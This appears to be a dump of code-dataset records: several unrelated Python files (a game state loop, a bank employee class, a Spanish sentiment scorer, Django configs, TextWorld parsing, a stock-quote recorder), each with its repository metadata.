BlueBall.update(frame_time)
RedBall.update(frame_time)
for block in blocks:
if block.left < BlueBall.x < block.right and block.bottom < BlueBall.y < block.top:
running = False
blueball_dead = True
elif block.left < RedBall.x < block.right and block.bottom < RedBall.y < block.top:
running = False
redball_dead = True
if blocks[len(blocks) - 1].y < -300:
game_framework.change_state(main_state)
if running == False:
count += 1
if count == 6:
if blueball_dead == True or redball_dead == True:
dead_animation_frame += 1
count = 0
if dead_animation_frame == 10:
enter()
def draw(frame_time):
clear_canvas()
image.draw(250,400)
for n in range(0 , 10):
if blueball_dead == False:
blueball_effect.draw(BlueBall.trace_x[n], BlueBall.trace_y[n])
if redball_dead == False:
redball_effect.draw(RedBall.trace_x[n], RedBall.trace_y[n])
for block in blocks:
block.Draw()
text_image.draw(50,780)
pausebutton_image.draw(470,770)
circle.draw(250,150)
if blueball_dead == False:
blueball.draw(BlueBall.x, BlueBall.y)
if redball_dead == False:
redball.draw(RedBall.x, RedBall.y)
if running == False:
if blueball_dead == True:
blueball_dead_image.clip_draw(dead_animation_frame * 106, 0, 106, 106, BlueBall.x, BlueBall.y)
elif redball_dead == True:
redball_dead_image.clip_draw(dead_animation_frame * 106, 0, 106, 106, RedBall.x, RedBall.y)
else:
pausemenu_image.draw(250, 400)
update_canvas()
pass
def handle_events(frame_time):
events = get_events()
global running
global move,reverse
for event in events:
if event.type == SDL_QUIT:
game_framework.quit()
elif event.type == SDL_MOUSEBUTTONDOWN and event.button == SDL_BUTTON_LEFT:
if 450 < event.x < 490 and 750 < 800 - event.y < 790:
if running == False:
resume()
else:
pause()
if 180 < event.x < 320 and 375 < 800 - event.y < 425:
if running == False:
game_framework.change_state(main_state)
if 210 < event.x < 290 and 320 < 800 - event.y < 360:
if running == False:
resume()
else:
if event.type == SDL_KEYDOWN and event.key == SDLK_ESCAPE:
game_framework.quit()
elif event.type == SDL_KEYDOWN and event.key == SDLK_BACKSPACE:
game_framework.change_state(stage7_state)
elif event.type == SDL_KEYDOWN and event.key == SDLK_a:
move = True
reverse = False
elif event.type == SDL_KEYDOWN and event.key == SDLK_d:
move = True
reverse = True
elif event.type == SDL_KEYDOWN and event.key == SDLK_m:
game_framework.change_state(main_state)
elif event.type == SDL_KEYUP and event.key == SDLK_a:
if reverse == False:
move = False
elif event.type == SDL_KEYUP and event.key == SDLK_d:
if reverse == True:
move = False
pass
def pause():
global running
running = False
pass
def resume():
global running
running = True
pass | [
"crow4079@naver.com"
] | crow4079@naver.com |
bebb7bc514d382106d8ed6f452d956b5a09201d4 | 72e68181ea99ed967a565975ae5d9119e486ea91 | /employee.py | 111655c82ee5cee19bea3686a0564e166337bc39 | [] | no_license | lmac02/HW4-ill | 71fcc48d7e1352a0a3d375c6eb90aaf4a858eba0 | 61983eb5985dd8aeab51fb903dbe749247e8e190 | refs/heads/master | 2020-04-11T01:13:44.921464 | 2018-03-12T22:12:32 | 2018-03-12T22:12:32 | 124,317,015 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 804 | py | from person import person
from person import make_routingNumber
from person import make_ssn
import random as r
from datetime import datetime as dt
class employee(person):
def __init__(self):
person.__init__(self)
self.employee_permissions = True
def ShowCustomerInfo(self, other):
print( 'Customer: {}\nD.O.B: {}/{}/{}\nAddress: {}\nAccount Number: {}\nRoutingNumber: {}\nBalance: {}'.format(other.name, other.birthdate.month, other.birthdate.day, other.birthdate.year, other.address, str(other.account_number).zfill(12), other.routing_number, other.balance))
def DeleteCustomer(self, other):
print('\nAction denied. Must be a manager to perform this action.')
def SeeCustomers(self):
print('\nNumber of customers: {}'.format(len(person.customer_list)))
| [
"noreply@github.com"
] | lmac02.noreply@github.com |
cdf3d09aaf600bff0fb8404dcd1901d6d23bd172 | c6b3abd156c09326c3a6e5da9e420eed6a5ffd8e | /Test/parameter_text.py | a4b8ac7fb51c882f8ec266a775559df5b60f0bb8 | [] | no_license | andoniVT/ESA_Final | 4c36230fd3b5e1232869ce366cb0fc15c68ed7ec | 065669df965589d00f84c2be873ada935bb0e3a9 | refs/heads/master | 2021-01-10T13:46:30.146613 | 2015-10-29T18:54:10 | 2015-10-29T18:54:10 | 43,454,014 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,397 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Created on 15/11/2014
@author: andoni
'''
import re
import Test.settings as settings
import Test.corpus as corpus
from Test.term import Term
from Test.manager_rule import Manager , Pattern
import Test.commentPreprocessor as CP
class ParameterText(object):
def __init__(self):
'''
Constructor
'''
self.__comment = ""
self.__contribution_positive = 0
self.__contribution_negative = 0
self.__number_elements_positive = 0
self.__number_elements_negative = 0
self.__crude_term_list = list()
self.__term_list = list()
self.__pattern_list = list()
self.__contribution_words_pos = list()
self.__contribution_words_neg = list()
self.__contribution_emoticons_pos = list()
self.__contribution_emoticons_neg = list()
self.__contribution_combinations_pos = list()
self.__contribution_combinations_neg = list()
self.__emoticons = corpus.emoticons_list(settings.EMOTICONS)
self.__booster_words = corpus.booster_words_list(settings.BOOSTER_WORDS_SPANISH)
self.__negating_words = corpus.negating_words_list(settings.NEGATING_WORDS_SPANISH)
self.__punctuation = corpus.punctuation_list(settings.PUNCTUATION)
self.__stopwords_list = corpus.stopwords_list(settings.STOPWORDS_SPANISH_OPINION_MINING)
self.__words_and_slangs = corpus.words_and_slangs_list(settings.SENTIMENT_WORDS_SPANISH, settings.SLANGS_PERUVIAN)
self.__combinations = corpus.combinations_list(settings.COMBINATIONS_SPANISH, settings.COMBINATIONS_SLANGS_PERUVIAN)
def evaluate(self, comment):
proccess = CP.Comment_proccesor(comment , False)
comment = proccess.get_processed_comment()
self.__comment = comment
comment = self.__search_combinations(comment)
self.__init_term_list(comment)
for term in self.__crude_term_list:
self.__tagging(term)
self.__apply_rules()
self.__analize_contributions()
def __tagging(self, term):
obj_term = Term(term)
new_term = obj_term.get_new_term()
# tipo = emoticon
result = self.__search(self.__emoticons, term)
if result != settings.TERM_NOT_FOUND:
obj_term.set_term_type(settings.TERM_TYPE_EMOTICON)
obj_term.set_original_weight(int(self.__emoticons[result]))
self.__term_list.append(obj_term)
return
# tipo = puntuacion
result = self.__search(self.__punctuation, new_term)
if result != settings.TERM_NOT_FOUND:
obj_term.set_term_type(settings.TERM_TYPE_PUNCTUATION)
obj_term.set_original_weight(int(self.__punctuation[result]))
self.__term_list.append(obj_term)
return
# tipo = palabras de realce
result = self.__search(self.__booster_words, new_term)
if result != settings.TERM_NOT_FOUND:
obj_term.set_term_type(settings.TERM_TYPE_BOOSTER)
obj_term.set_original_weight(int(self.__booster_words[result]))
self.__term_list.append(obj_term)
return
# tipo = negacion
if new_term in self.__negating_words:
obj_term.set_term_type(settings.TERM_TYPE_NEGATING)
self.__term_list.append(obj_term)
return
# tipo = palabra o jerga
#new_term = self.__corrector.correct(new_term)
#obj_term.set_new_term(new_term)
#new_dictionary = dict(self.__words_and_slangs.items() + self.__new_simple_vocabulary.items() + self.__modified_words.items())
result = self.__search(self.__words_and_slangs, new_term)
#result = self.__search(new_dictionary, new_term)
if result != settings.TERM_NOT_FOUND:
obj_term.set_term_type(settings.TERM_TYPE_WORD_SLANG)
obj_term.set_original_weight(int(self.__words_and_slangs[result]))
#obj_term.set_original_weight(int(new_dictionary[result]))
self.__term_list.append(obj_term)
return
# tipo = neutral
obj_term.set_term_type(settings.TERM_TYPE_NEUTRO)
self.__term_list.append(obj_term)
def __apply_rules(self):
manager = Manager(self.__term_list)
manager.apply_rules()
self.__pattern_list = manager.get_patterns_list()
def __analize_contributions(self):
for pattern in self.__pattern_list:
if pattern.get_contribution_type() == Pattern.CONTRIBUTION_WORD:
if pattern.get_total_weight() >= 0: self.__contribution_words_pos.append(pattern)
else: self.__contribution_words_neg.append(pattern)
elif pattern.get_contribution_type() == Pattern.CONTRIBUTION_EMOTICON:
if pattern.get_total_weight() >= 0: self.__contribution_emoticons_pos.append(pattern)
else: self.__contribution_emoticons_neg.append(pattern)
else:
if pattern.get_total_weight() >= 0: self.__contribution_combinations_pos.append(pattern)
else: self.__contribution_combinations_neg.append(pattern)
def get_contribution_words_pos(self):
total = 0
for pattern in self.__contribution_words_pos:
total += pattern.get_total_weight()
return total
def get_contribution_words_neg(self):
total = 0
for pattern in self.__contribution_words_neg:
total += pattern.get_total_weight()
return total
def get_contribution_emoticons_pos(self):
total = 0
for pattern in self.__contribution_emoticons_pos:
total += pattern.get_total_weight()
return total
def get_contribution_emoticons_neg(self):
total = 0
for pattern in self.__contribution_emoticons_neg:
total += pattern.get_total_weight()
return total
def get_contribution_combinations_pos(self):
total = 0
for pattern in self.__contribution_combinations_pos:
total += pattern.get_total_weight()
return total
def get_contribution_combinations_neg(self):
total = 0
for pattern in self.__contribution_combinations_neg:
total += pattern.get_total_weight()
return total
def get_contribution_positive(self):
self.__contribution_positive = self.get_contribution_words_pos() + self.get_contribution_emoticons_pos() + self.get_contribution_combinations_pos()
return self.__contribution_positive
def get_contribution_negative(self):
self.__contribution_negative = self.get_contribution_words_neg() + self.get_contribution_emoticons_neg() + self.get_contribution_combinations_neg()
return self.__contribution_negative
def get_number_words_pos(self):
return len(self.__contribution_words_pos)
def get_number_words_neg(self):
return len(self.__contribution_words_neg)
def get_number_emoticons_pos(self):
return len(self.__contribution_emoticons_pos)
def get_number_emoticons_neg(self):
return len(self.__contribution_emoticons_neg)
def get_number_combinations_pos(self):
return len(self.__contribution_combinations_pos)
def get_number_combinations_neg(self):
return len(self.__contribution_combinations_neg)
def get_number_elements_positive(self):
self.__number_elements_positive = self.get_number_words_pos() + self.get_number_emoticons_pos() + self.get_number_combinations_pos()
return self.__number_elements_positive
def get_number_elements_negative(self):
self.__number_elements_negative = self.get_number_words_neg() + self.get_number_emoticons_neg() + self.get_number_combinations_neg()
return self.__number_elements_negative
def __init_term_list(self, comment):
tmp_list = re.split("\s+",comment) # Divide el texto por cualquier caracter en blanco
for term in tmp_list:
if not term in self.__stopwords_list:
if term in self.__emoticons:
self.__crude_term_list.append(term)
else:
process = CP.Comment_proccesor()
term = process.remove_punctuation_marks(term)
if len(term) > 0:
index = term.find("!")
if index == -1: index = term.find("?")
if index > 0:
self.__crude_term_list.append(term[:index])
self.__crude_term_list.append(term[index:])
else:
self.__crude_term_list.append(term)
def __search (self, tmp_list, term):
for word in tmp_list:
if word.count(settings.FLEXIS_SIMBOL) > 0: # Si contiene flexis
root_word = word.replace(settings.FLEXIS_SIMBOL, "")
if term.startswith(root_word, 0) and len(term) > len(root_word):
return word
else:
if term == word:
return word
return settings.TERM_NOT_FOUND
def __search_combinations(self, comment):
comment_lower = comment.lower()
#new_dictionary = dict(self.__combinations.items() + self.__new_combination_vocabulary.items() + self.__modified_combinations.items())
#for combination in new_dictionary:
for combination in self.__combinations:
if comment_lower.find(combination) >= 0:
obj_term = Term(combination)
obj_term.set_term_type(settings.TERM_TYPE_COMBINATION)
obj_term.set_original_weight(int(self.__combinations[combination]))
self.__term_list.append(obj_term)
comment = re.sub(combination, "", comment, flags=re.IGNORECASE)
return comment
def print_terms(self):
for pattern in self.__pattern_list:
print(pattern.get_contribution_type(), pattern.description(), pattern.get_total_weight())
def clean_data(self):
''' Re-inicializa todas las listas '''
self.__crude_term_list = list()
self.__term_list = list()
self.__pattern_list = list()
self.__contribution_words_pos = list()
self.__contribution_words_neg = list()
self.__contribution_emoticons_pos = list()
self.__contribution_emoticons_neg = list()
self.__contribution_combinations_pos = list()
self.__contribution_combinations_neg = list()
if __name__ == '__main__':
import time
print("Starting... ",time.strftime("%H:%M:%S %d %b"))
obj = ParameterText()
comment = "poco bueno muy bueno poco malo muy malo"
#comment = "muy bueno!!! muy mal!!! poco bueno!!! poco mal!!!"
#comment = "no muy bueno no muy malo"
#comment = "@ClaroPeru Hola, actualmente tengo un Nextel pero quiero migrar a Claro manteniendo el mismo número. Cuál es el procedimiento?"
obj.evaluate(comment)
obj.print_terms()
print("Finished... ",time.strftime("%H:%M:%S %d %b"))
| [
"andoni.valverde@ucsp.edu.pe"
] | andoni.valverde@ucsp.edu.pe |
5b443bc248f4ba4e33ec6a112ee23731ed68ef18 | c0eaa927a308c95f66c3d3be881d69f21eca024c | /Main/urls.py | b6ded82991322f4145371ee802796e85ae80d996 | [] | no_license | gitRobV/Main | 45d96de24e6a55cefe1fdf676bcce9a4cd9a490b | d75ec66176f0eeb5717be4d3ead723434a2971d0 | refs/heads/master | 2020-12-03T09:16:27.405098 | 2017-06-28T01:28:27 | 2017-06-28T01:28:27 | 95,613,647 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 742 | py | """Main URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
urlpatterns = [
url(r'^', include('apps.main.urls')),
]
| [
"robertv1979@gmail.com"
] | robertv1979@gmail.com |
643abe60ca6014563cdd023652e73a2d29a6797e | cc22c017e3b7a127218755f7183c377235eb76dd | /persona.py | 6844c9aa40e6c868a6d8ba7b0a6efdc7332d0d23 | [] | no_license | iandrade90/python-crud-pool-conn | 17efb74115e77cbb9211211fd0895dd2a5b6d9d6 | 139f40b51c2d159823ca4be9e4fcc619b275fe32 | refs/heads/main | 2023-04-15T12:47:33.718000 | 2021-04-27T01:49:54 | 2021-04-27T01:49:54 | 361,946,918 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 997 | py | class Persona():
def __init__(self, id_persona=None, nombre=None, apellido=None, email=None):
self.__id_persona = id_persona
self.__nombre = nombre
self.__apellido = apellido
self.__email = email
def __str__(self):
return (
f'ID persona: {self.__id_persona}, '
f'Nombre: {self.__nombre}, '
f'Apellido: {self.__apellido}, '
f'Email: {self.__email}'
)
def set_nombre(self, nombre):
self.__nombre = nombre
def set_apellido(self, apellido):
self.__apellido = apellido
def set_email(self, email):
self.__email = email
def set_personaid(self, id_persona):
self.__id_persona = id_persona
def get_personaid(self):
return self.__id_persona
def get_nombre(self):
return self.__nombre
def get_apellido(self):
return self.__apellido
def get_email(self):
return self.__email
| [
"ivandandrade90@gmail.com"
] | ivandandrade90@gmail.com |
1c460f138444384b52eda73ccc1a7db8da23d76b | d554b1aa8b70fddf81da8988b4aaa43788fede88 | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/225/users/3999/codes/1635_2442.py | 7d4cb10f6eb2bb08c1ebeeb9ad94276bb7866760 | [] | no_license | JosephLevinthal/Research-projects | a3bc3ca3b09faad16f5cce5949a2279cf14742ba | 60d5fd6eb864a5181f4321e7a992812f3c2139f9 | refs/heads/master | 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 271 | py | # Teste seu código aos poucos.
# Não teste tudo no final, pois fica mais difícil de identificar erros.
# Use as mensagens de erro para corrigir seu código.
num=int(input("Digite um numero: "))
if (num%2==0):
mensagem="par"
else:
mensagem="impar"
print(mensagem) | [
"jvlo@icomp.ufam.edu.br"
] | jvlo@icomp.ufam.edu.br |
ae09bb1661be801f7980a94afbbefdc6ad13a5f0 | 995377be6b76ba82972a8d6a06723ff534a11704 | /mysite/urls.py | fba60b92ee343dae4317be3d364e35117125c3e2 | [
"MIT"
] | permissive | ChechonsOrganization/mysite-django3byexample | 8a5bdd0e31625bc2aee167901f1f5e10453c9894 | f8c0a341df30599c35d52e5205242b0e5906150c | refs/heads/master | 2023-03-21T15:27:32.042118 | 2021-03-10T13:35:45 | 2021-03-10T13:35:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,175 | py | """mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
# Añadir Sitemap de blog
from django.contrib.sitemaps.views import sitemap
from blog.sitemaps import PostSitemap
# Sitemaps
sitemaps = {
'posts': PostSitemap
}
urlpatterns = [
path('admin/', admin.site.urls),
# Incluir el patron URL de la aplicacion blog en el proyecto
path('blog/', include('blog.urls', namespace='blog')),
# Incluir el Sitemap
path('sitemap.xml', sitemap, {'sitemaps': sitemaps}, name='django.contrib.sitemaps.views.sitemap')
]
| [
"sergio.04.ramirez@gmail.com"
] | sergio.04.ramirez@gmail.com |
34b224ca169154804d42c83f0596df550b7665ef | 96e9da624caaa4d93fe6c8807bf8876c9e38729b | /agents/utils/parsing.py | 76018c275957536f0fca77ffae100dd39c40ee9e | [] | no_license | APodolskiy/TextWorld_Challenge | 89c3da5b8601795ec3c733c1dcc4bdc9c1c9f6ba | 74a6de102edb697304b5f5ecb47115d187171c10 | refs/heads/master | 2020-04-22T23:27:34.622316 | 2019-07-11T07:36:30 | 2019-07-11T07:36:30 | 170,742,519 | 1 | 0 | null | 2019-07-11T07:36:31 | 2019-02-14T18:59:54 | Python | UTF-8 | Python | false | false | 1,949 | py | from pathlib import Path
from pprint import pprint
from random import shuffle
from typing import List
import gym
import textworld.gym
def parse_recipe(recipe: str):
dir_pos = recipe.find("Directions:")
ing_pos = recipe.find("Ingredients:")
description = [s.strip() for s in recipe[dir_pos:].split("\n")[1:] if s]
description.append("eat meal")
ingredients = [s.strip() for s in recipe[ing_pos:dir_pos].split("\n")[1:] if s]
return ingredients, description
def parse_inventory(inventory: str):
real_inventory = inventory.split("You are carrying")[1].strip()
if real_inventory.startswith(":"):
return [s.strip() for s in real_inventory[2:].split("\n")]
return []
def get_missing_ingredients_from_inventory(available_items: List, recipe_items: List):
return [
item
for item in recipe_items
if not any(obj.endswith(item) for obj in available_items)
]
if __name__ == "__main__":
from agents.DRQN.custom_agent import BaseQlearningAgent
# gamefile = "games/train_sample/tw-cooking-recipe1+cut+drop+go9-oW8msba8TGYoC6Pl.ulx"
game_dir = Path("games/train")
game_files = [str(d) for d in game_dir.iterdir() if d.name.endswith("ulx")]
shuffle(game_files)
game_files = game_files[:40]
env_id = textworld.gym.register_games(
game_files,
BaseQlearningAgent.select_additional_infos(),
max_episode_steps=100,
name="training_par",
)
env = gym.make(env_id)
for game in game_files:
obs, infos = env.reset()
recipe = infos["extra.recipe"]
inventory = infos["inventory"]
print(env.env.current_gamefile)
print(infos["extra.walkthrough"])
pprint(parse_recipe(recipe)[0])
parsed_inventory = parse_inventory(inventory)
print(parsed_inventory)
print("MISSING:", get_missing_ingredients_from_inventory(inventory, recipe))
print("#" * 60)
| [
"dimich3d@ya.ru"
] | dimich3d@ya.ru |
78cd02f35eb33e0dca1c10049960dc96d060c161 | f445450ac693b466ca20b42f1ac82071d32dd991 | /generated_tempdir_2019_09_15_163300/generated_part006597.py | f32e3be699fb19351abe7424a78bedb56216f820 | [] | no_license | Upabjojr/rubi_generated | 76e43cbafe70b4e1516fb761cabd9e5257691374 | cd35e9e51722b04fb159ada3d5811d62a423e429 | refs/heads/master | 2020-07-25T17:26:19.227918 | 2019-09-15T15:41:48 | 2019-09-15T15:41:48 | 208,357,412 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,302 | py | from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *
class CommutativeMatcher125926(CommutativeMatcher):
_instance = None
patterns = {
0: (0, Multiset({}), [
(VariableWithCount('i2.2.3.1.0', 1, 1, None), Mul),
(VariableWithCount('i2.2.3.1.0_1', 1, 1, S(1)), Mul)
])
}
subjects = {}
subjects_by_id = {}
bipartite = BipartiteGraph()
associative = Mul
max_optional_count = 1
anonymous_patterns = set()
def __init__(self):
self.add_subject(None)
@staticmethod
def get():
if CommutativeMatcher125926._instance is None:
CommutativeMatcher125926._instance = CommutativeMatcher125926()
return CommutativeMatcher125926._instance
@staticmethod
def get_match_iter(subject):
subjects = deque([subject]) if subject is not None else deque()
subst0 = Substitution()
# State 125925
return
yield
from collections import deque | [
"franz.bonazzi@gmail.com"
] | franz.bonazzi@gmail.com |
9b2b62d6c9e2308e570b19de28085ae1f34c35a9 | 7bcb0b7f721c8fa31da7574f13ed0056127715b3 | /src/apps/api/resources/subscription.py | 62e5a4c74c86c9613ca6bd0c1ba0aeca5007fa3d | [] | no_license | simonchapman1986/ripe | 09eb9452ea16730c105c452eefb6a6791c1b4a69 | c129da2249b5f75015f528e4056e9a2957b7d884 | refs/heads/master | 2022-07-22T05:15:38.485619 | 2016-01-15T12:53:43 | 2016-01-15T12:53:43 | 49,718,671 | 1 | 0 | null | 2022-07-07T22:50:50 | 2016-01-15T12:53:09 | Python | UTF-8 | Python | false | false | 455 | py | from apps.base.models import FactServicesStorefrontSubscription
from tastypie.resources import ModelResource
class SubscriptionResource(ModelResource):
class Meta:
queryset = FactServicesStorefrontSubscription.objects.all()
list_allowed_methods = ['get']
detail_allowed_methods = ['get']
resource_name = 'entry'
filtering = {
'event_time': ['exact', 'range', 'gt', 'gte', 'lt', 'lte'],
} | [
"simon-ch@moving-picture.com"
] | simon-ch@moving-picture.com |
105f39188ea14f446671389556da928dc7a2a49f | d5fb21eec872bde734b967f31ae822a22316ce8b | /samplesite/bboard/migrations/0001_initial.py | 314b155cf0ee449eb546856667590acfcab560d0 | [] | no_license | isys35/lessons_django3_dronov | 27cea948ce0d4af1ff8fa3a2ba09b1f4b6b6e04c | c14f68854968b36bae3584172b9479f44c519306 | refs/heads/master | 2023-06-11T03:17:30.877993 | 2021-07-02T11:45:10 | 2021-07-02T11:45:10 | 317,238,079 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 708 | py | # Generated by Django 3.1.3 on 2020-11-30 13:04
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Bb',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=50)),
('content', models.TextField(blank=True, null=True)),
('price', models.FloatField(blank=True, null=True)),
('published', models.DateTimeField(auto_now_add=True, db_index=True)),
],
),
]
| [
"isys35@mail.ru"
] | isys35@mail.ru |
7cad58a9f69a867abfe4d091be275e040d48a0d4 | d44c05216e554e0d0b279fd6d7e6bcfe4755c399 | /pieces/bing.py | f1f67c4eae56d7f2a037325cfcff38965780b8e7 | [
"MIT"
] | permissive | east-before-dawn/Check-Chess-Cheer | bef5c53dc0e5b88c96c5fcfde9fba55cfef773fd | 6c7562d1358bf12946693221b5414d9fbb676841 | refs/heads/main | 2023-06-09T17:10:02.293679 | 2021-06-15T11:08:47 | 2021-06-15T11:08:47 | 401,147,724 | 1 | 1 | MIT | 2021-08-29T21:41:08 | 2021-08-29T21:41:08 | null | UTF-8 | Python | false | false | 1,446 | py | from NormalPiece import NormalPiece
class Bing(NormalPiece):
def __init__(self, x, y, color):
NormalPiece.__init__(self, x, y, color)
"""
找该棋子的图片路径
"""
def get_image_path(self):
if self.selected == True:
if self.color == 'red':
return "images/Rbing_S.gif"
else:
return "images/Bbing_S.gif"
else:
if self.color == 'red':
return "images/Rbing.gif"
else:
return "images/Bbing.gif"
"""
判断该逻辑位置(prex,prey)能不能落子
"""
def can_move(self, prex, prey, chessboard):
x, y = self.x, self.y
dx, dy = prex - self.x, prey - self.y
# 越界
if prex < 0 or prex > 8 or prey < 0 or prey > 9:
return False
# 点到己方棋子
if (prex, prey) in chessboard.all_pieces and chessboard.all_pieces[prex, prey].color == self.color:
return False
# 只能走一步
if abs(dx) + abs(dy) != 1:
return False
# 不能后退
if (self.is_north() and dy == -1) or (self.is_south() and dy == 1):
return False
# 过了河之后才能横着走,没过河只能直着走
if dy == 0:
if (self.is_north() and y < 5) or (self.is_south() and y > 4):
return False
return True
| [
"389041637@qq.com"
] | 389041637@qq.com |
b42508610856a9da00e6b77138872e63aab1b223 | 50f04c633f36e9d64c40c4f1b434ed0c24e447c7 | /argparse-examples/positionalarg.py | 047332844d22ec1332227b4bb8bc6c545fec0f22 | [] | no_license | sarahchou/python-practice | 883ba7dedd60b2cc18d5d73ef7d3cbb74f09dede | 2a3d10144b74460d8ec513e3c7d49bdb48107596 | refs/heads/master | 2022-11-11T10:06:12.944579 | 2018-06-11T22:14:06 | 2018-06-11T22:14:06 | 136,985,077 | 0 | 1 | null | 2022-10-20T08:48:36 | 2018-06-11T21:54:46 | Python | UTF-8 | Python | false | false | 305 | py | #Introduction to positional arguments
import argparse
parser = argparse.ArgumentParser()
# parser.add_argument("echo", help="echo the string you use here")
parser.add_argument("square", help="display a square of a given number", type=int)
args = parser.parse_args()
# print args.echo
print args.square**2
| [
"chou.s@husky.neu.edu"
] | chou.s@husky.neu.edu |
08e5f8478bb5c283fa2e2c074c5942fd8ce543c0 | 35d094f33d0c2f840298b6a38113701f7c22e92a | /load/bin/record-index-quotes.py | c7a4073f454d0e05df2c0a984620dd2ddb0f32ec | [] | no_license | sqt-aliu/etl | e40e0879f820d5523b408c9aed4ff2b1944cfe3e | 63e0c5dda81e1a849b10c724661c8cfa6b7f832f | refs/heads/master | 2020-04-05T13:39:42.120815 | 2017-11-07T01:59:22 | 2017-11-07T01:59:22 | 94,945,798 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,144 | py | #!/opt/anaconda3/bin/python -u
import getopt
import os
import pandas as pd
import sys
from sqlalchemy import create_engine, exc
from datetime import datetime, date, timedelta
from dateutil.relativedelta import relativedelta
from urllib.parse import urlencode
from urllib.request import urlopen
from urllib.error import URLError, HTTPError
from time import sleep
from xml.dom import minidom
sys.path.append(os.path.abspath(os.path.dirname(__file__) + '/' + '../..'))
from common.lib.log import debug, error, fatal, info, warn
from extract.lib.google import GoogleHistorical
def read_config(config):
info("Reading file " + config)
config_map = {}
xmldoc = minidom.parse(config)
for indexNode in xmldoc.getElementsByTagName('index'):
indexKey = indexNode.getAttribute('key')
indexVal = indexNode.getAttribute('value')
config_map[indexKey] = indexVal
return (config_map)
def download_quotes(ticker, start=None, end=None, iteration=1, max_tries=2):
url = 'https://www.google.com/finance/historical'
quotes = {}
params = {}
params['q'] = ticker
params['num'] = 200
if not start is None:
params['startdate'] = start
if not end is None:
params['enddate'] = end
try:
urlparams = urlencode(params)
url = url + '?' + urlparams
info("Requesting url [%s]" % (url))
urlResp = urlopen(url, timeout=30)
html = urlResp.read().decode('utf-8')
urlResp.close()
# instantiate the parser and fed it some HTML
htmlparser = GoogleHistorical()
htmlparser.feed(html)
quotes.update(htmlparser.data)
#handle errors
except HTTPError as e:
error("HTTP Error: %s, url=%s, attempt=%i" % (str(e.code), url, iteration))
if iteration <= max_tries:
download_quotes(ticker, start, end, iteration=iteration+1)
except URLError as e:
error("URL Error: %s, url=%s, attempt=%i" % (e.reason, url, iteration))
if iteration <= max_tries:
download_quotes(ticker, start, end, iteration=iteration+1)
except OSError as e:
error("OS Error: %s, url=%s, attempt=%i" % (e, url, iteration))
if iteration <= max_tries:
download_quotes(ticker, start, end, iteration=iteration+1)
except:
error("Unknown Error: %s, url=%s, attempt=%i" % (sys.exc_info()[0], url, iteration))
if iteration <= max_tries:
download_quotes(ticker, start, end, iteration=iteration+1)
return(quotes)
def insert_quotes(ticker, dbconn, quotes):
if len(quotes) > 0:
try:
info("Creating MariaDB Engine...")
db = create_engine(dbconn, echo=False)
conn = db.connect()
sql = "Select * From prices Where ticker = '%s'" % (ticker)
info("Executing query [%s]" % (sql))
df = pd.read_sql_query(sql, conn, index_col='date')
for quote_date, quote_vals in sorted(quotes.items()):
if quote_date.date() in df.index:
info("Record already exists [%s][%s]...skipping" % (ticker, quote_date))
else:
try:
sql = "INSERT INTO prices VALUES ('%s','%s',%s,%s,%s,%s,'G')" % (ticker, datetime.strftime(quote_date, '%Y-%m-%d'), quote_vals['OP'], quote_vals['HI'], quote_vals['LO'], quote_vals['CL'])
info("Executing query [%s]" % (sql))
db.execute(sql)
except exc.IntegrityError as e:
error("DB Integrity Error: %s, sql=%s" % (e, sql))
except exc.SQLAlchemyError as e:
error("DB SQLAlchemy Error: %s, sql=%s" % (e, sql))
conn.close()
except exc.SQLAlchemyError as e:
error("Database Error: %s, conn=%s" % (e, dbconn))
except:
error("Unknown Error: %s, conn=%s" % (sys.exc_info()[0], dbconn))
else:
warn("No quotes found for ticker %s" % (ticker))
def record_quotes(config, dbconn, batch=False):
index_map = read_config(config)
for k,v in sorted(index_map.items()):
if batch:
current_date = datetime.strptime('1999-01-01', '%Y-%m-%d')
while True:
end_date = (current_date + relativedelta(months=4)) - timedelta(days=1)
start = current_date.strftime("%b %d, %Y")
end = end_date.strftime("%b %d, %Y")
insert_quotes(k, dbconn, download_quotes(v, start, end))
if end_date > datetime.today():
break
current_date = end_date + timedelta(days=1)
sleep(5)
else:
insert_quotes(k, dbconn, download_quotes(v))
def print_usage():
print (" Usage: %s [options]" % (os.path.basename(__file__)))
print (" Options:")
print (" \t-c, --config\tconfiguration file")
print (" \t-d, --database\tdatabase connection string")
print (" \t-b, --batch\tbatch mode")
